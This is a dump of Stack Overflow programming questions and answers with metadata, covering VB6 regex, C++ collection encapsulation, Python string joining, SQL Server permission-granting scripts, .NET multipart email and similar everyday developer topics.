text
stringlengths 8
267k
| meta
dict |
---|---|
Q: Regex in VB6? I need to write a program that can sift through specially-formatted text files (essentially CSV files with a fixed set of column types that have different delimiters for some columns ... comma in most places, colons in others) to search for formatting errors. I figure regular expressions will be the way to go.
The question: Is there a good regex library for VB6?
Thank you!
Edit: Holy crap, 3 responses in under an hour. Thanks a ton, folks! I've heard such good things about Regex Buddy from Jeff's postings / podcasting, that I will have to take a look.
A: Use the Regex COM component built into Windows. You can find a step by step on referencing and using it in your project at: http://www.regular-expressions.info/vb.html
A: Regex Buddy has a VB6 library
I use this in Delphi and it's very good - and Jeff has raved about RegexBuddy on several occasions.
I can't speak for the VB implementation, but it's certainly worth a look.
A: As you probably know, VB6 didn't ship with a built-in regular expression library. You can, however, use one provided by an ActiveX or COM library. See this article for details.
A: Other answers are correct, but link-only answers, so for convenience:
In File → References, add the "Microsoft VBScript Regular Expressions 5.5" library:
Now you can use the library in your code:
Dim matcher As RegExp
Set matcher = New RegExp
matcher.Pattern = "^super cool string$"
If matcher.Test(someString) Then
'...do something...
End If
As usual, regular-expressions.info provides the best reference material.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44660",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: dotNetNuke/Moodle integration anyone out there have a moodle module for dotnetnuke, or some kind of integration setup that at least allows SSO?
A: This webpage provides details on how to implement Single Sign-on between DotNetNuke and Moodle.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44692",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: Efficient alternatives for exposing a Collection In C++, what alternatives do I have for exposing a collection, from the point of view of performance and data integrity?
My problem is that I want to return an internal list of data to the caller, but I don't want to generate a copy. Thant leaves me with either returning a reference to the list, or a pointer to the list. However, I'm not crazy about letting the caller change the data, I just want to let it read the data.
*
*Do I have to choose between performance and data integrity?
*If so, is in general better to go one way or is it particular to the case?
*Are there other alternatives?
A: Many times the caller wants access just to iterate over the collection. Take a page out of Ruby's book and make the iteration a private aspect of your class.
#include <algorithm>
#include <boost/function.hpp>
class Blah
{
public:
void for_each_data(const std::function<void(const mydata&)>& f) const
{
std::for_each(myPreciousData.begin(), myPreciousData.end(), f);
}
private:
typedef std::vector<mydata> mydata_collection;
mydata_collection myPreciousData;
};
With this approach you're not exposing anything about your internals, i.e. that you even have a collection.
A: RichQ's answer is a reasonable technique, if you're using an array, vector, etc.
If you're using a collection that isn't indexed by ordinal values... or think you might need to at some point in the near future... then you might want to consider exposing your own iterator type(s), and associated begin()/end() methods:
class Blah
{
public:
typedef std::vector<mydata> mydata_collection;
typedef myDataCollection::const_iterator mydata_const_iterator;
// ...
mydata_const_iterator data_begin() const
{ return myPreciousData.begin(); }
mydata_const_iterator data_end() const
{ return myPreciousData.end(); }
private:
mydata_collection myPreciousData;
};
...which you can then use in the normal fashion:
Blah blah;
for (Blah::mydata_const_iterator itr = blah.data_begin();
itr != blah.data_end();
++itr)
{
// ...
}
A: Maybe something like this?
const std::vector<mydata>& getData()
{
return _myPrivateData;
}
The benefit here is that it's very, very simple, and as safe as you getin C++. You can cast this, like RobQ suggests, but there's nothing you can do that would prevent someone from that if you're not copying. Here, you would have to use const_cast, which is pretty easy to spot if you're looking for it.
Iterators, alternatively, might get you pretty much the same thing, but it's more complicated. The only added benefit of using iterators here (that I can think of) is that you can have better encapsulation.
A: Use of const reference or shared pointer will only help if the contents of underlying collection do not change over time.
Consider your design. Does the caller really need to see the internal array? Can you restructure the code so that the caller tells object what to do with the array? E.g., if the caller intends to search the array, could the owner object do it?
You could pass a reference to result vector to the function. On some compilers that may result in marginally faster code.
I would recommend trying to redesign first, going with a clean solution second, optimizing for performance third (if necessary).
A: One advantage of both @Shog9's and @RichQ's solutions is that they de-couple the client from the collection implementation.
If you decide th change your collection type to something else, your clients will still work.
A: What you want is read-only access without copying the entire blob of data. You have a couple options.
Firstly, you could just return a const refererence to whatever your data container is, like suggested above:
const std::vector<T>& getData() { return mData; }
This has the disadvantage of concreteness: you can't change how you store the data internally without changing the interface of your class.
Secondly, you can return const-ed pointers to the actual data:
const T* getDataAt(size_t index)
{
return &mData[index];
}
This is a bit nicer, but also requires that you provide a getNumItems call, and protect against out-of-bounds indices. Also, the const-ness of your pointers is easily cast away, and your data is now read-write.
Another option is to provide a pair of iterators, which is a bit more complex. This has the same advantages of pointers, as well as not (necessarily) needing to provide a getNumItems call, and there's considerably more work involved to strip the iterators of their const-ness.
Probably the easiest way to manage this is by using a Boost Range:
typedef vector<T>::const_iterator range_iterator_type;
boost::iterator_range< range_iterator_type >& getDataRange()
{
return boost::iterator_range(mData.begin(), mData.end());
}
This has the advantages of ranges being composable, filterable, etc, as you can see on the website.
A: Using const is a reasonable choice.
You may also wish to check out the boost C++ library for their shared pointer implementation. It provides the advantages of pointers i.e. you may have the requirement to return a shared pointer to "null" which a reference would not allow.
http://www.boost.org/doc/libs/1_36_0/libs/smart_ptr/smart_ptr.htm
In your case you would make the shared pointer's type const to prohibit writes.
A: If you have a std::list of plain old data (what .NET would call 'value types'), then returning a const reference to that list will be fine (ignoring evil things like const_cast)
If you have a std::list of pointers (or boost::shared_ptr's) then that will only stop you modifying the collection, not the items in the collection. My C++ is too rusty to be able to tell you the answer to that at this point :-(
A: The following two articles elaborate on some of the issues involved in, and the need for, encapsulating container classes. Although they do not provide a complete worked solution, they essentially lead to the same approach as given by Shog9.
Part 1: Encapsulation and Vampires
Part 2 (free registration is now required to read this): Train Wreck Spotting
by Kevlin Henney
A: I suggest using callbacks along the lines of EnumChildWindows. You will have to find some means to prevent the user from changing your data. Maybe use a const pointer/reference.
On the other hand, you could pass a copy of each element to the callback function overwriting the copy each time. (You do not want to generate a copy of your entire collection. I am only suggesting making a copy one element at a time. That shouldn't take much time/memory).
MyClass tmp;
for(int i = 0; i < n; i++){
tmp = elements[i];
callback(tmp);
}
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44693",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "12"
} |
Q: VB.NET Empty String Array How can I create an empty one-dimensional string array?
A: The array you created by Dim s(0) As String IS NOT EMPTY
In VB.Net, the subscript you use in the array is index of the last element. VB.Net by default starts indexing at 0, so you have an array that already has one element.
You should instead try using System.Collections.Specialized.StringCollection or (even better) System.Collections.Generic.List(Of String). They amount to pretty much the same thing as an array of string, except they're loads better for adding and removing items. And let's be honest: you'll rarely create an empty string array without wanting to add at least one element to it.
If you really want an empty string array, declare it like this:
Dim s As String()
or
Dim t() As String
A: Something like:
Dim myArray(9) as String
Would give you an array of 10 String references (each pointing to Nothing).
If you're not sure of the size at declaration time, you can declare a String array like this:
Dim myArray() as String
And then you can point it at a properly-sized array of Strings later:
ReDim myArray(9) as String
ZombieSheep is right about using a List if you don't know the total size and you need to dynamically populate it. In VB.NET that would be:
Dim myList as New List(Of String)
myList.Add("foo")
myList.Add("bar")
And then to get an array from that List:
myList.ToArray()
@Mark
Thanks for the correction.
A: You don't have to include String twice, and you don't have to use New.
Either of the following will work...
Dim strings() as String = {}
Dim strings as String() = {}
A: VB is 0-indexed in array declarations, so seomthing like Dim myArray(10) as String gives you 11 elements. It's a common mistake when translating from C languages.
So, for an empty array, either of the following would work:
Dim str(-1) as String ' -1 + 1 = 0, so this has 0 elements
Dim str() as String = New String() { } ' implicit size, initialized to empty
A: Dim strEmpty(-1) As String
A: Another way of doing this:
Dim strings() As String = {}
Testing that it is an empty string array:
MessageBox.Show("count: " + strings.Count.ToString)
Will show a message box saying "count: 0".
A: A little verbose, but self documenting...
Dim strEmpty() As String = Enumerable.Empty(Of String).ToArray
A: Not sure why you'd want to, but the C# way would be
string[] newArray = new string[0];
I'm guessing that VB won't be too dissimilar to this.
If you're building an empty array so you can populate it with values later, you really should consider using
List<string>
and converting it to an array (if you really need it as an array) with
newListOfString.ToArray();
A: Dim array As String() = Array.Empty(Of String)
A: try this
Dim Arraystr() as String ={}
A: I know this is an old thread, but another way to create an empty one-dimensional string array is to use the Array.Empty<T> method.
E.g.,
VB.NET
Dim emptyStringArray() As String = Array.Empty(Of String)()
C#
string[] emptyStringArray = Array.Empty<string>()
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44713",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "55"
} |
Q: How to have two remote origins for Git? Our git server will be local, but we want an server where our local repo is also kept online but only used in a push to fashion.
How can one do that?
A: You can add remotes with git remote add <name> <url>
You can then push to a remote with git push <name> master:master to push your local master branch to the remote master branch.
When you create a repo with git clone the remote is named origin but you can create a public repository for your online server and push to it with git push public master:master
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44714",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "19"
} |
Q: Why do Ruby setters need "self." qualification within the class? Ruby setters—whether created by (c)attr_accessor or manually—seem to be the only methods that need self. qualification when accessed within the class itself. This seems to put Ruby alone the world of languages:
*
*All methods need self/this (like Perl, and I think Javascript)
*No methods require self/this is (C#, Java)
*Only setters need self/this (Ruby?)
The best comparison is C# vs Ruby, because both languages support accessor methods which work syntactically just like class instance variables: foo.x = y, y = foo.x . C# calls them properties.
Here's a simple example; the same program in Ruby then C#:
class A
def qwerty; @q; end # manual getter
def qwerty=(value); @q = value; end # manual setter, but attr_accessor is same
def asdf; self.qwerty = 4; end # "self." is necessary in ruby?
def xxx; asdf; end # we can invoke nonsetters w/o "self."
def dump; puts "qwerty = #{qwerty}"; end
end
a = A.new
a.xxx
a.dump
take away the self.qwerty =() and it fails (Ruby 1.8.6 on Linux & OS X). Now C#:
using System;
public class A {
public A() {}
int q;
public int qwerty {
get { return q; }
set { q = value; }
}
public void asdf() { qwerty = 4; } // C# setters work w/o "this."
public void xxx() { asdf(); } // are just like other methods
public void dump() { Console.WriteLine("qwerty = {0}", qwerty); }
}
public class Test {
public static void Main() {
A a = new A();
a.xxx();
a.dump();
}
}
Question: Is this true? Are there other occasions besides setters where self is necessary? I.e., are there other occasions where a Ruby method cannot be invoked without self?
There are certainly lots of cases where self becomes necessary. This is not unique to Ruby, just to be clear:
using System;
public class A {
public A() {}
public int test { get { return 4; }}
public int useVariable() {
int test = 5;
return test;
}
public int useMethod() {
int test = 5;
return this.test;
}
}
public class Test {
public static void Main() {
A a = new A();
Console.WriteLine("{0}", a.useVariable()); // prints 5
Console.WriteLine("{0}", a.useMethod()); // prints 4
}
}
Same ambiguity is resolved in same way. But while subtle I'm asking about the case where
*
*A method has been defined, and
*No local variable has been defined, and
we encounter
qwerty = 4
which is ambiguous—is this a method invocation or an new local variable assignment?
@Mike Stone
Hi! I understand and appreciate the points you've made and your
example was great. Believe me when I say, if I had enough reputation,
I'd vote up your response. Yet we still disagree:
*
*on a matter of semantics, and
*on a central point of fact
First I claim, not without irony, we're having a semantic debate about the
meaning of 'ambiguity'.
When it comes to parsing and programming language semantics (the subject
of this question), surely you would admit a broad spectrum of the notion
'ambiguity'. Let's just adopt some random notation:
*
*ambiguous: lexical ambiguity (lex must 'look ahead')
*Ambiguous: grammatical ambiguity (yacc must defer to parse-tree analysis)
*AMBIGUOUS: ambiguity knowing everything at the moment of execution
(and there's junk between 2-3 too). All these categories are resolved by
gathering more contextual info, looking more and more globally. So when you
say,
"qwerty = 4" is UNAMBIGUOUS in C#
when there is no variable defined...
I couldn't agree more. But by the same token, I'm saying
"qwerty = 4" is un-Ambiguous in ruby
(as it now exists)
"qwerty = 4" is Ambiguous in C#
And we're not yet contradicting each other. Finally, here's where we really
disagree: Either ruby could or could not be implemented without any further
language constructs such that,
For "qwerty = 4," ruby UNAMBIGUOUSLY
invokes an existing setter if there
is no local variable defined
You say no. I say yes; another ruby could exist which behaves exactly like
the current in every respect, except "qwerty = 4" defines a new
variable when no setter and no local exists, it invokes the setter if one
exists, and it assigns to the local if one exists. I fully accept that I
could be wrong. In fact, a reason why I might be wrong would be interesting.
Let me explain.
Imagine you are writing a new OO language with accessor methods looking
like instances vars (like ruby & C#). You'd probably start with
conceptual grammars something like:
var = expr // assignment
method = expr // setter method invocation
But the parser-compiler (not even the runtime) will puke, because even after
all the input is grokked there's no way to know which grammar is pertinent.
You're faced which a classic choice. I can't be sure of the details, but
basically ruby does this:
var = expr // assignment (new or existing)
// method = expr, disallow setter method invocation without .
that is why it's un-Ambiguous, while and C# does this:
symbol = expr // push 'symbol=' onto parse tree and decide later
// if local variable is def'd somewhere in scope: assignment
// else if a setter is def'd in scope: invocation
For C#, 'later' is still at compile time.
I'm sure ruby could do the same, but 'later' would have to be at runtime, because
as ben points out you don't know until the statement is executed which case
applies.
My question was never intended to mean "do I really need the 'self.'?" or "what
potential ambiguity is being avoided?" Rather I wanted to know why was this
particular choice made? Maybe it's not performance. Maybe it just got the job
done, or it was considered best to always allow a 1-liner local to override a
method (a pretty rare case requirement) ...
But I'm sort of suggesting that the most dynamical language might be the one which
postpones this decision the longest, and chooses semantics based on the most contextual
info: so if you have no local and you defined a setter, it would use the setter. Isn't
this why we like ruby, smalltalk, objc, because method invocation is decided at runtime,
offering maximum expressiveness?
A: Well, I think the reason this is the case is because qwerty = 4 is ambiguous—are you defining a new variable called qwerty or calling the setter? Ruby resolves this ambiguity by saying it will create a new variable, thus the self. is required.
Here is another case where you need self.:
class A
def test
4
end
def use_variable
test = 5
test
end
def use_method
test = 5
self.test
end
end
a = A.new
a.use_variable # returns 5
a.use_method # returns 4
As you can see, the access to test is ambiguous, so the self. is required.
Also, this is why the C# example is actually not a good comparison, because you define variables in a way that is unambiguous from using the setter. If you had defined a variable in C# that was the same name as the accessor, you would need to qualify calls to the accessor with this., just like the Ruby case.
A: The important thing to remember here is that Ruby methods can be (un)defined at any point, so to intelligently resolve the ambiguity, every assignment would need to run code to check whether there is a method with the assigned-to name at the time of assignment.
A: Because otherwise it would be impossible to set local variables at all inside of methods. variable = some_value is ambiguous. For example:
class ExampleClass
attr_reader :last_set
def method_missing(name, *args)
if name.to_s =~ /=$/
@last_set = args.first
else
super
end
end
def some_method
some_variable = 5 # Set a local variable? Or call method_missing?
puts some_variable
end
end
If self wasn't required for setters, some_method would raise NameError: undefined local variable or method 'some_variable'. As-is though, the method works as intended:
example = ExampleClass.new
example.blah = 'Some text'
example.last_set #=> "Some text"
example.some_method # prints "5"
example.last_set #=> "Some text"
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44715",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "79"
} |
Q: Howto Enable Font Antialiasing in Windows I have downloaded a font that looks less than desirable if it is not anti-aliased. I can not figure out how to enable anti-aliasing in VS, I have changed the 'Smooth Edges of Screen Fonts' in the system performance options but that does not seem to help.
VS2008 on XP SP3.
What am I missing?
A: In Windows 7:
Control Panel | Display | Adjust ClearType text
This starts a 4-step calibration process.
A: Try using ClearType, not Standard font smoothing.
It's in Display properties, Appearance, Effects.
A: Could it be a problem with the color combination? Some fonts look really ugly on high contrast combinations with a black background.
Also, can you see the difference in the fonts in any other application?
Which font is it?
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44721",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "21"
} |
Q: Is there a plugin for targetting .NET 1.1 with VS 2008? Is there a plugin for targetting .NET 1.1 with VS 2008?
A: From what I know, you can hack the build files to target the 1.1 runtime instead.
Google for your question and you should turn up pages like this one.
A: According to Scott Guthrie, the reason VS 2008 does not support 1.0 or 1.1...
"...is that there were significant CLR engine changes between .NET 1.x and 2.x that make debugging very difficult to support. In the end the costing of the work to support that was so large and impacted so many parts of Visual Studio that we weren't able to add 1.1 support in this release."
Sounds like it would be difficult to really create such a plugin. The only hope you might find in his statement is that they "weren't able to add 1.1 support in this release" (emphasis mine). i.e. maybe they will add it down the road.
I wouldn't hold my breath though.
EDIT: Looks like the link @lassevk provided shows some promise for those people that can't accept running VS 2003 side-by-side with VS 2008. Looks like a lot of work though. :)
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44737",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: How to cache ASP.NET user controls? I heard on a recent podcast (Polymorphic) that it is possible to cache a user control as opposed to the entire page.
I think my header control which displays static content and my footer control could benefit from being cached.
How can I go about caching just those controls?
A: Take a look here
You can use VaryByParam and VaryByControl in the output cache.
A: I think you can specify OutputCache in the control's markup file like you'd do on an ASPX page. And it'd get properly cached automatically.
Just read up on OutputCache page directive on MSDN and get the parameters right and it should do what you want it to.
It's been a long time since I write classic ASP.NET but I believe that's how it's done.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44757",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: Eclipse "Share Project" by hand? What actually happens to the file system when you do a Subclipse Share Project on an Eclipse project that was externally checked out from Subversion? All the .svn folders are already in place. I get an error when I try to Share Project the right way, and I'd rather not delete and re-checkout the projects from the SVN Repository browser.
A: The Share Project action is intended to commit the first version of a project, i.e. one with no .svn metadata in place. It will get upset if it sees .svn directories already there. As Rob wrote, the way to get that checked-out project into Eclipse is to use the import capability.
A: Dunno exactly what happens within eclipse, I presume it does some funky stuff in the .metadata directory of the workspace. That said, I would recommend the following to get eclipse to learn about the svn settings of the project:
*
*Delete the project from the workspace (keep "Delete project contents on disk" unchecked)
*File > Import... > General > Existing Projects into Workspace
*Browse to the folder containing the original project(s) of interest
*Import the projects into your workspace
This seems to have the side effect of subclipse noticing the subversion settings when importing the "new" projects into your workspace.
A: I'm not sure what version of Eclipse you are using or whether this will apply since I'm using Subversive instead of Subclipse. When I use the share project feature to commit the project into svn when I already have all of the .svn directories in place, I get a choice of like "Use current project settings" and then eclipse automatically reattaches the project svn information to the team integration. You can screw it up if you try to enter different information.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44760",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "6"
} |
Q: Ajax Autocomplete Webservice Call - Service Method, am I calling this correctly? Ok, so my method in my webservice requires a type to be passed, it is called in the ServiceMethod property of the AutoCompleteExtender, I am fuzzy about how I should do that so I called it like this:
ServiceMethod="DropDownLoad<<%=(typeof)subCategory%>>"
where subCategory is a page property that looks like this:
protected SubCategory subCategory
{
get
{
var subCategory = NHibernateObjectHelper.LoadDataObject<SubCategory>(Convert.ToInt32(Request.QueryString["SCID"]));
return subCategory;
}
}
A: You could use the AutoCompleteExtender's ContextKey parameter to use a single web method that accepted a type name as its context key. Then in the web method, use reflection and that parameter to return the desired string[].
A: I dont' think calling a Generic Method on a webservice is possible.
If you look at the service description of two identical methods, one generic, one not:
[WebMethod]
public string[] GetSearchList(string prefixText, int count)
{
}
[WebMethod]
public string[] GetSearchList2<T>(string prefixText, int count)
{
}
They are identical. It appears that both SOAP 1.x and HTTP POST do not allow this type of operation.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44771",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: Sending a mail as both HTML and Plain Text in .net I'm sending mail from my C# Application, using the SmtpClient. Works great, but I have to decide if I want to send the mail as Plain Text or HTML. I wonder, is there a way to send both? I think that's called multipart.
I googled a bit, but most examples essentially did not use SmtpClient but composed the whole SMTP-Body themselves, which is a bit "scary", so I wonder if something is built in the .net Framework 3.0?
If not, is there any really well used/robust Third Party Library for sending e-Mails?
A: On top of using AlternateViews views to add both the html and the plain text view, make sure you are not also setting the body of the Mail Message object.
// do not do this:
var msg = new MailMessage(model.From, model.To);
msg.Body = compiledHtml;
As it will make your email contain the html content in both views, overriding the alternative views.
A: For the people(like me) who've had the problem of gmail displaying the plaintext part instead of the html part.
Gmail seems to always display the last part in your message.
So if you've added the html part before your plain text part chances are gmail will always show the plain text variant.
To fix this you can simply add the plain text part before your html part.
A: The MSDN Documentation seems to miss one thing though, I had to set the content type manually, but otherwise, it works like a charm :-)
MailMessage msg = new MailMessage(username, nu.email, subject, body);
msg.BodyEncoding = Encoding.UTF8;
msg.SubjectEncoding = Encoding.UTF8;
AlternateView htmlView = AlternateView.CreateAlternateViewFromString(htmlContent);
htmlView.ContentType = new System.Net.Mime.ContentType("text/html");
msg.AlternateViews.Add(htmlView);
A: What you want to do is use the AlternateViews property on the MailMessage
http://msdn.microsoft.com/en-us/library/system.net.mail.mailmessage.alternateviews.aspx
A: Just want to add that you can use defined constants MediaTypeNames.Text.Html and MediaTypeNames.Text.Plain instead of "text/html" and "text/plain", which is always a preferable way. It's in System.Net.Mime namespace.
So in the example above, it would be:
AlternateView htmlView = AlternateView.CreateAlternateViewFromString(htmlContent, null, MediaTypeNames.Text.Html);
A: I'm just going to put a note here for anyone that's having problems and finds their way to this page - sometimes, Outlook SMTP servers will reconvert outgoing email. If you're seeing your plain-text body vanish entirely, and nothing but base64-encoded attachments, it might be because your server is reencoding the email. Google's SMTP server does not reencode email - try sending through there and see what happens.
A: For anyone who bumped into this issue you might want to check if you have preheader tags in your html.
In my html I've added a tag with a phrase of "Activate your client admin account by clicking the link.".
It seems like gmail is flagging the phrase "clicking the link" after removing it, all my emails that has been sent, are going straight to the inbox.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44777",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "52"
} |
Q: How would you make a comma-separated string from a list of strings? What would be your preferred way to concatenate strings from a sequence such that between every two consecutive pairs a comma is added. That is, how do you map, for instance, ['a', 'b', 'c'] to 'a,b,c'? (The cases ['s'] and [] should be mapped to 's' and '', respectively.)
I usually end up using something like ''.join(map(lambda x: x+',',l))[:-1], but also feeling somewhat unsatisfied.
A: Why the map/lambda magic? Doesn't this work?
>>> foo = ['a', 'b', 'c']
>>> print(','.join(foo))
a,b,c
>>> print(','.join([]))
>>> print(','.join(['a']))
a
In case if there are numbers in the list, you could use list comprehension:
>>> ','.join([str(x) for x in foo])
or a generator expression:
>>> ','.join(str(x) for x in foo)
A: l=['a', 1, 'b', 2]
print str(l)[1:-1]
Output: "'a', 1, 'b', 2"
A: @jmanning2k using a list comprehension has the downside of creating a new temporary list. The better solution would be using itertools.imap which returns an iterator
from itertools import imap
l = [1, "foo", 4 ,"bar"]
",".join(imap(str, l))
A: Here is an example with list
>>> myList = [['Apple'],['Orange']]
>>> myList = ','.join(map(str, [i[0] for i in myList]))
>>> print "Output:", myList
Output: Apple,Orange
More Accurate:-
>>> myList = [['Apple'],['Orange']]
>>> myList = ','.join(map(str, [type(i) == list and i[0] for i in myList]))
>>> print "Output:", myList
Output: Apple,Orange
Example 2:-
myList = ['Apple','Orange']
myList = ','.join(map(str, myList))
print "Output:", myList
Output: Apple,Orange
A: If you want to do the shortcut way :) :
','.join([str(word) for word in wordList])
But if you want to show off with logic :) :
wordList = ['USD', 'EUR', 'JPY', 'NZD', 'CHF', 'CAD']
stringText = ''
for word in wordList:
stringText += word + ','
stringText = stringText[:-2] # get rid of last comma
print(stringText)
A: ",".join(l) will not work for all cases. I'd suggest using the csv module with StringIO
import StringIO
import csv
l = ['list','of','["""crazy"quotes"and\'',123,'other things']
line = StringIO.StringIO()
writer = csv.writer(line)
writer.writerow(l)
csvcontent = line.getvalue()
# 'list,of,"[""""""crazy""quotes""and\'",123,other things\r\n'
A: Here is a alternative solution in Python 3.0 which allows non-string list items:
>>> alist = ['a', 1, (2, 'b')]
*
*a standard way
>>> ", ".join(map(str, alist))
"a, 1, (2, 'b')"
*the alternative solution
>>> import io
>>> s = io.StringIO()
>>> print(*alist, file=s, sep=', ', end='')
>>> s.getvalue()
"a, 1, (2, 'b')"
NOTE: The space after comma is intentional.
A: @Peter Hoffmann
Using generator expressions has the benefit of also producing an iterator but saves importing itertools. Furthermore, list comprehensions are generally preferred to map, thus, I'd expect generator expressions to be preferred to imap.
>>> l = [1, "foo", 4 ,"bar"]
>>> ",".join(str(bit) for bit in l)
'1,foo,4,bar'
A: Don't you just want:
",".join(l)
Obviously it gets more complicated if you need to quote/escape commas etc in the values. In that case I would suggest looking at the csv module in the standard library:
https://docs.python.org/library/csv.html
A: my_list = ['a', 'b', 'c', 'd']
my_string = ','.join(my_list)
'a,b,c,d'
This won't work if the list contains integers
And if the list contains non-string types (such as integers, floats, bools, None) then do:
my_string = ','.join(map(str, my_list))
A: >>> my_list = ['A', '', '', 'D', 'E',]
>>> ",".join([str(i) for i in my_list if i])
'A,D,E'
my_list may contain any type of variables. This avoid the result 'A,,,D,E'.
A: Unless I'm missing something, ','.join(foo) should do what you're asking for.
>>> ','.join([''])
''
>>> ','.join(['s'])
's'
>>> ','.join(['a','b','c'])
'a,b,c'
(edit: and as jmanning2k points out,
','.join([str(x) for x in foo])
is safer and quite Pythonic, though the resulting string will be difficult to parse if the elements can contain commas -- at that point, you need the full power of the csv module, as Douglas points out in his answer.)
A: I would say the csv library is the only sensible option here, as it was built to cope with all csv use cases such as commas in a string, etc.
To output a list l to a .csv file:
import csv
with open('some.csv', 'w', newline='') as f:
writer = csv.writer(f)
writer.writerow(l) # this will output l as a single row.
It is also possible to use writer.writerows(iterable) to output multiple rows to csv.
This example is compatible with Python 3, as the other answer here used StringIO which is Python 2.
A: mmm also need for SQL is :
l = ["foo" , "baar" , 6]
where_clause = "..... IN ("+(','.join([ f"'{x}'" for x in l]))+")"
>> "..... IN ('foo','baar','6')"
enjoit
A: My two cents. I like simpler an one-line code in python:
>>> from itertools import imap, ifilter
>>> l = ['a', '', 'b', 1, None]
>>> ','.join(imap(str, ifilter(lambda x: x, l)))
a,b,1
>>> m = ['a', '', None]
>>> ','.join(imap(str, ifilter(lambda x: x, m)))
'a'
It's pythonic, works for strings, numbers, None and empty string. It's short and satisfies the requirements. If the list is not going to contain numbers, we can use this simpler variation:
>>> ','.join(ifilter(lambda x: x, l))
Also this solution doesn't create a new list, but uses an iterator, like @Peter Hoffmann pointed (thanks).
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44778",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "671"
} |
Q: What's the best way to implement a SQL script that will grant permissions to a database role on all the user tables in a database? What's the best way to implement a SQL script that will grant select, references, insert, update, and delete permissions to a database role on all the user tables in a database?
Ideally, this script could be run multiple times, as new tables were added to the database. SQL Server Management Studio generates scripts for individual database objects, but I'm looking for more of a "fire-and-forget" script.
A: I'm sure there is an easier way, but you could loop through the sysobjects table in the database and grant permissions to any user table objects that exist. You could then run that multiple times whenever new tables are added.
A: Dr Zimmerman is on the right track here. I'd be looking to write a stored procedure that has a cursor looping through user objects using execute immediate to affect the grant. Something like this:
IF EXISTS (
SELECT 1 FROM sysobjects
WHERE name = 'sp_grantastic'
AND type = 'P'
)
DROP PROCEDURE sp_grantastic
GO
CREATE PROCEDURE sp_grantastic
AS
DECLARE
@object_name VARCHAR(30)
,@time VARCHAR(8)
,@rights VARCHAR(20)
,@role VARCHAR(20)
DECLARE c_objects CURSOR FOR
SELECT name
FROM sysobjects
WHERE type IN ('P', 'U', 'V')
FOR READ ONLY
BEGIN
SELECT @rights = 'ALL'
,@role = 'PUBLIC'
OPEN c_objects
WHILE (1=1)
BEGIN
FETCH c_objects INTO @object_name
IF @@SQLSTATUS <> 0 BREAK
SELECT @time = CONVERT(VARCHAR, GetDate(), 108)
PRINT '[%1!] hitting up object %2!', @time, @object_name
EXECUTE('GRANT '+ @rights +' ON '+ @object_name+' TO '+@role)
END
PRINT '[%1!] fin!', @time
CLOSE c_objects
DEALLOCATE CURSOR c_objects
END
GO
GRANT ALL ON sp_grantastic TO PUBLIC
GO
Then you can fire and forget:
EXEC sp_grantastic
A: There's an undocumented MS procedure called sp_MSforeachtable that you could use which is definitely in 2000 and 2005.
To grant select permissions the usage would be:
EXECUTE sp_MSforeachtable @command1=' Grant Select on ? to RoleName'
To grant the other permissions either have a new statement for each one or just add them to the command like this:
EXECUTE sp_MSforeachtable @command1=' Grant Select on ? to RoleName; Grant Delete on ? to RoleName;'
With a bit of playing around it might be possible to turn the role name into a parameter as well.
A: We use something similar where I work. Looping through every Tables, Views, Stored Procedures of the system.
CREATE PROCEDURE dbo.SP_GrantFullAccess
@username varchar(300)
AS
DECLARE @on varchar(300)
DECLARE @count int
SET @count = 0
PRINT 'Granting access to user ' + @username + ' on the following objects:'
DECLARE c CURSOR FOR
SELECT name FROM sysobjects WHERE type IN('U', 'V', 'SP', 'P') ORDER BY name
OPEN c
FETCH NEXT FROM c INTO @on
WHILE @@FETCH_STATUS = 0
BEGIN
SET @count = @count + 1
EXEC('GRANT ALL ON [' + @on + '] TO [' + @username + ']')
--PRINT 'GRANT ALL ON [' + @on + '] TO ' + @username
PRINT @on
FETCH NEXT FROM c INTO @on
END
CLOSE c
DEALLOCATE c
PRINT 'Granted access to ' + cast(@count as varchar(4)) + ' object(s).'
GO
A: use [YourDb]
GO
exec sp_MSforeachtable @command1=
"GRANT DELETE, INSERT, REFERENCES, SELECT, UPDATE ON ? TO Admins, Mgmt",
@whereand = " and o.name like 'tbl_%'"
GO
use [YourDb]
GO
exec sp_MSforeachtable @command1=
"GRANT REFERENCES, SELECT ON ? TO Employee, public",
@whereand = " and o.name like 'tbl_%'"
GO
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44780",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: How do you get the current image name from an ASP.Net website? Scenario: You have an ASP.Net webpage that should display the next image in a series of images. If 1.jpg is currently loaded, the refresh should load 2.jpg.
Assuming I would use this code, where do you get the current images name.
string currImage = MainPic.ImageUrl.Replace(".jpg", "");
currImage = currImage.Replace("~/Images/", "");
int num = (Convert.ToInt32(currImage) + 1) % 3;
MainPic.ImageUrl = "~/Images/" + num.ToString() + ".jpg";
